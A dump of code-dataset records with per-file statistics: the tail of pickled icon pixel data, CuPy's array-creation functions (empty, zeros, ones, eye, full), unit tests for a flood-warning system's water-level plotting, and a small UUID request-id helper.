a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xcd\\xcd\\xcd\\xffyyy\\xff$$$\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe3\\xe3\\xe3\\xff\\x91\\x91\\x91\\xff<<<\\xff\\x01\\x01\\x01\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xc3\\xc3\\xc3\\xfflll\\xff\\x18\\x18\\x18\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xffmmm\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe4\\xe4\\xe4\\xff\\xa6\\xa6\\xa6\\xffOOO\\xff\\x07\\x07\\x07\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff555\\xff\\xb4\\xb4\\xb4\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd9\\xd9\\xd9\\xff\\x8a\\x8a\\x8a\\xff333\\xff\\xcb\\xcb\\xcb\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff+++\\xff\\x88\\x88\\x88\\xff\\xda\\xda\\xda\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xd2\\xd2\\xd2\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\n\\n\\n\\xff[[[\\xff\\xb8\\xb8\\xb8\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xdc\\xdc\\xdc\\xffAAA\\xff\\x02\\x02\\x02\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff...\\xff\\x8c\\x8c\\x8c\\xff\\xdc\\xdc\\xdc\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xcc\\xcc\\xcc\\xffsss\\xff\\x1a\\x1a\\x1a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0c\\x0c\\x0c\\xff___\\xff\\xbc\\xbc\\xbc\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe5\\xe5\\xe5\\xff\\xa5\\xa5\\xa5\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff222\\xff\\x8f\\x8f\\x8f\\xff\\xde\\xde\\xde\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xffccc\\xff\\xc0\\xc0\\xc0\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff555\\xff\\x94\\x94\\x94\\xff\\xe0\\xe0\\xe0\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x10\\x10\\x10\\xfffff\\xff\\xc4\\xc4\\xc4\\xff\\xe7\\xe7\\xe7\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff:::\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00'\np13\ntp14\nb."}
| 10,938.666667
| 20,444
| 0.60021
| 13,036
| 65,632
| 3.021095
| 0.021479
| 0.349339
| 0.263261
| 0.347663
| 0.941396
| 0.930503
| 0.929513
| 0.92738
| 0.92479
| 0.920016
| 0
| 0.203631
| 0.000503
| 65,632
| 5
| 20,445
| 13,126.4
| 0.396729
| 0
| 0
| 0
| 0
| 1.2
| 0.963981
| 0.963158
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 17
|
8a58b436d68c59696458a2751cff5fe08edd9a40
| 5,422
|
py
|
Python
|
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | null | null | null |
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | 1
|
2016-11-09T06:32:32.000Z
|
2016-11-09T10:20:04.000Z
|
cupy/creation/basic.py
|
fukuta0614/Chainer
|
337fe78e1c27924c1195b8b677a9b2cd3ea68828
|
[
"MIT"
] | 1
|
2021-05-27T16:52:11.000Z
|
2021-05-27T16:52:11.000Z
|
import cupy
def empty(shape, dtype=float):
"""Returns an array without initializing the elements.
This function currently does not support ``order`` option.
Args:
shape (tuple of ints): Dimensionalities of the array.
dtype: Data type specifier.
Returns:
cupy.ndarray: A new array with elements not initialized.
.. seealso:: :func:`numpy.empty`
"""
# TODO(beam2d): Support ordering option
return cupy.ndarray(shape, dtype=dtype)
def empty_like(a, dtype=None):
"""Returns a new array with same shape and dtype of a given array.
This function currently does not support ``order`` and ``subok`` options.
Args:
a (cupy.ndarray): Base array.
dtype: Data type specifier. The data type of ``a`` is used by default.
Returns:
cupy.ndarray: A new array with same shape and dtype of ``a`` with
elements not initialized.
.. seealso:: :func:`numpy.empty_like`
"""
# TODO(beam2d): Support ordering option
if dtype is None:
dtype = a.dtype
return empty(a.shape, dtype=dtype)
def eye(N, M=None, k=0, dtype=float):
"""Returns a 2-D array with ones on the diagonals and zeros elsewhere.
Args:
N (int): Number of rows.
M (int): Number of columns. M == N by default.
k (int): Index of the diagonal. Zero indicates the main diagonal,
a positive index an upper diagonal, and a negative index a lower
diagonal.
dtype: Data type specifier.
Returns:
cupy.ndarray: A 2-D array with given diagonals filled with ones and
zeros elsewhere.
.. seealso:: :func:`numpy.eye`
"""
if M is None:
M = N
ret = zeros((N, M), dtype)
ret.diagonal(k)[:] = 1
return ret
def identity(n, dtype=float):
"""Returns a 2-D identity array.
It is equivalent to ``eye(n, n, dtype)``.
Args:
n (int): Number of rows and columns.
dtype: Data type specifier.
Returns:
cupy.ndarray: A 2-D identity array.
.. seealso:: :func:`numpy.identity`
"""
return eye(n, dtype=dtype)
def ones(shape, dtype=float):
"""Returns a new array of given shape and dtype, filled with ones.
This function currently does not support ``order`` option.
Args:
shape (tuple of ints): Dimensionalities of the array.
dtype: Data type specifier.
Returns:
cupy.ndarray: An array filled with ones.
.. seealso:: :func:`numpy.ones`
"""
# TODO(beam2d): Support ordering option
return full(shape, 1, dtype)
def ones_like(a, dtype=None):
"""Returns an array of ones with same shape and dtype as a given array.
This function currently does not support ``order`` and ``subok`` options.
Args:
a (cupy.ndarray): Base array.
dtype: Data type specifier. The dtype of ``a`` is used by default.
Returns:
cupy.ndarray: An array filled with ones.
.. seealso:: :func:`numpy.ones_like`
"""
# TODO(beam2d): Support ordering option
if dtype is None:
dtype = a.dtype
return ones(a.shape, dtype)
def zeros(shape, dtype=float):
"""Returns a new array of given shape and dtype, filled with zeros.
This function currently does not support ``order`` option.
Args:
shape (tuple of ints): Dimensionalities of the array.
dtype: Data type specifier.
Returns:
cupy.ndarray: An array filled with ones.
.. seealso:: :func:`numpy.zeros`
"""
# TODO(beam2d): Support ordering option
a = empty(shape, dtype)
a.data.memset(0, a.nbytes)
return a
def zeros_like(a, dtype=None):
"""Returns an array of zeros with same shape and dtype as a given array.
This function currently does not support ``order`` and ``subok`` options.
Args:
a (cupy.ndarray): Base array.
dtype: Data type specifier. The dtype of ``a`` is used by default.
Returns:
cupy.ndarray: An array filled with ones.
.. seealso:: :func:`numpy.zeros_like`
"""
# TODO(beam2d): Support ordering option
if dtype is None:
dtype = a.dtype
return zeros(a.shape, dtype=dtype)
def full(shape, fill_value, dtype=None):
"""Returns a new array of given shape and dtype, filled with a given value.
This function currently does not support ``order`` option.
Args:
shape (tuple of ints): Dimensionalities of the array.
fill_value: A scalar value to fill a new array.
dtype: Data type specifier.
Returns:
cupy.ndarray: An array filled with ``fill_value``.
.. seealso:: :func:`numpy.full`
"""
# TODO(beam2d): Support ordering option
a = empty(shape, dtype)
a.fill(fill_value)
return a
def full_like(a, fill_value, dtype=None):
"""Returns a full array with same shape and dtype as a given array.
This function currently does not support ``order`` and ``subok`` options.
Args:
a (cupy.ndarray): Base array.
fill_value: A scalar value to fill a new array.
dtype: Data type specifier. The dtype of ``a`` is used by default.
Returns:
cupy.ndarray: An array filled with ``fill_value``.
.. seealso:: :func:`numpy.full_like`
"""
# TODO(beam2d): Support ordering option
if dtype is None:
dtype = a.dtype
return full(a.shape, fill_value, dtype)
| 25.575472
| 79
| 0.629288
| 754
| 5,422
| 4.503979
| 0.124668
| 0.048587
| 0.03828
| 0.064782
| 0.793286
| 0.767668
| 0.70318
| 0.700825
| 0.655183
| 0.644582
| 0
| 0.004027
| 0.267245
| 5,422
| 211
| 80
| 25.696682
| 0.850743
| 0.710439
| 0
| 0.324324
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037915
| 0
| 1
| 0.27027
| false
| 0
| 0.027027
| 0
| 0.567568
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
8a6e15a32cbd9c0e36fac80495b2430c5418db5d
| 2,083
|
py
|
Python
|
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
test_plot.py
|
WeeraddanaKarunarathne/Flood-Warning-System
|
5c578dc2c791457e690d1deefc64d0bfb47e300e
|
[
"MIT"
] | null | null | null |
""" Unit test for the plot module """
from floodsystem.plot import plot_water_levels, plot_water_level_with_fit
from floodsystem.station import MonitoringStation
from floodsystem.stationdata import build_station_list, update_water_levels
from floodsystem.datafetcher import fetch_measure_levels
from floodsystem.plot import plot_water_levels
import matplotlib.pyplot as plt
import datetime
def test_plot_water_levels():
stations = build_station_list()
update_water_levels(stations)
updated_levels = []
highest_levels = []
station_list = []
for station in stations:
if station.latest_level != None:
updated_levels.append(station.latest_level)
else:
continue
updated_levels.sort()
highest_levels = updated_levels[-5:]
for station in stations:
for i in range(0, len(highest_levels)):
if highest_levels[i] == station.latest_level:
station_list.append(station)
else:
pass
for item in station_list:
dt=10
dates, levels = fetch_measure_levels(item.measure_id, dt=datetime.timedelta(days=dt))
assert len(dates) == len(levels)
def test_plot_water_level_with_fit():
stations = build_station_list()
update_water_levels(stations)
updated_levels = []
highest_levels = []
station_list = []
for station in stations:
if station.latest_level != None:
updated_levels.append(station.latest_level)
else:
continue
updated_levels.sort()
highest_levels = updated_levels[-5:]
for station in stations:
for i in range(0, len(highest_levels)):
if highest_levels[i] == station.latest_level:
station_list.append(station)
else:
pass
for item in station_list:
dt=2
dates, levels = fetch_measure_levels(item.measure_id, dt=datetime.timedelta(days=dt))
assert len(dates) == len(levels)
| 27.773333
| 94
| 0.643783
| 244
| 2,083
| 5.233607
| 0.22541
| 0.077525
| 0.084573
| 0.062647
| 0.824589
| 0.791699
| 0.765857
| 0.703211
| 0.703211
| 0.703211
| 0
| 0.004676
| 0.281325
| 2,083
| 75
| 95
| 27.773333
| 0.848363
| 0.013922
| 0
| 0.792453
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.037736
| 1
| 0.037736
| false
| 0.037736
| 0.132075
| 0
| 0.169811
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a8ae1564606519f1fead981dc2e19a4fc275991
| 61
|
py
|
Python
|
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
api/utils/common_util.py
|
pengtianabc/sanic-app
|
5c9327151871a11972cc03dbe61576601703789e
|
[
"MIT"
] | null | null | null |
import uuid
def GenRequestId():
return uuid.uuid1().hex
| 20.333333
| 27
| 0.704918
| 8
| 61
| 5.375
| 0.875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02
| 0.180328
| 61
| 3
| 27
| 20.333333
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
